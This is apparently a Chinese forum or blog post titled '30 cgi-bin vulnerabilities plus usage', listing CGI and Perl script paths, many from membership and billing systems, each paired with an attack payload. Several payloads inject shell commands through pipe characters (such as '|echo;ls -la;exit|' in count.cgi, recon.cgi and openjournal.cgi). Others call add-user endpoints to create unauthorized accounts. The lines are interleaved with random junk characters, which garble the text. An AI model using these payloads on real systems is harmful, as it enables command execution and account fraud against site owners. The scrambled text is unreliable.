Cgi-bin 30个漏洞＋使用方法

admin

==============================

3 Y2 G- \2 N( a/smspass.pl
username=username&password=password
7 S& @: ~' S; p/ _+ z9 ?
9 O# W% y- R1 d' D, y4 v! T/index.cgi
wei=ren&gen=command
. R2 o# w" x; N
9 E5 h! e4 X; `8 l/ r- R/passmaster.cgi
0 p. T7 f) _/ T5 e  l( n; SAction=Add&Username=Username&Password=Password
6 C5 E& ]" S& J, h2 v( T% `" G
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
* ]2 K8 H- o1 Z6 m( ~
! j$ E$ m& a7 q: F6 a/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

2 O) l  B) w, G- W# J/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
7 ~4 W: p. f' ]
/ccbill-local.asp
% X& Q' D+ v& N" o$ Y$ npost_values=username:password

8 }! e+ }4 y1 p# m: ^/count.cgi
; F9 M% |6 w( b7 |pinfile=|echo;ls -la;exit|
* ?+ K0 V, c( s. x2 U
/recon.cgi
. [5 S' M8 e0 r/recon.cgi?search
8 [7 O& u9 y1 k# l; g2 w# fsearchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
4 X) M2 k2 V/ X, X% j
0 Q9 U  {! a2 [7 r* h/af.cgi
* _4 t; l7 t. [5 b6 Z# s- }, U_browser_out=|echo;ls -la;exit;|
2 L) G5 v0 M, S  e
( c6 W$ [5 e4 [- H3 X6 i2 r. y/modify.cgi
username=username&password=password&expire=30
! }' g8 I' v3 A6 r, W
/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
. c3 G1 q) {9 m  c* D
% S* e* R$ o* X% ^+ ]1 y" V/gx9passwd.cgi
) J" Q- H" F7 Tcmd=ADD&user=username&pass=password

/probecontrol.cgi
& L! L) g6 |) u- |  G8 ~* ^command=enable&username=username&password=password
5 Y/ k/ y7 x# }; u" m5 V  U
6 u: I7 I" o4 ~/ ~# s0 k/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
6 ^$ ?& B* b, q- ]# {# A# c
/htadd.pl
0 T- P3 ?+ L( k1 f5 M$ zconfigfile=|echo; ls -alt; exit
, k1 Q+ m9 G$ `: a
/ v  o% [- @2 s7 `7 c2 Z1 ]/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

. n+ _* {$ j3 R! b! u$ N/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

3 l5 Q) w7 _* B* H* K4 M5 G/usercontrol.cgi
command=enable&username=USER&password=PASS
2 x# r& L/ j- L& e" |7 {0 c
/globoSALErum.cgi
& D& M5 u9 _, }' X& F7 Qaction=ADD&seccode=seccode&login=username&password=password

/addusr.pl
4 Y0 E0 t8 o+ p/ |user=USER&pass=PASS&confirm=PASS

/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
$ e9 r$ Q9 R+ }2 i( rpinfile=|echo;pwd;exit|
+ i4 ~: x! e3 e6 |4 F
/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
; A5 x  n( s* {1 F6 s3 b9 susername=username&password=password&password2=password&ref1=|echo;ls -al;exit

" N0 h- e$ ^1 J3 t1 f/af.cgi
- j+ ], i# D( X8 g: y, H/env.cgi
1 O+ b6 ?5 [/ Q; Q- `( _$ AADD+;echo;pwd;exit

/ N1 B) `: n$ i/count.cgi
* _! ?3 j$ u4 z3 spinfile=|echo;pwd;exit|
. [9 O/ r) _2 k" R( Y
/ A* `+ o  ~7 P( E/ `; \/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
9 B# C2 J# \: Y8 |username=username&password=password&expire=30

==============================
# G: _  R' \# V0 P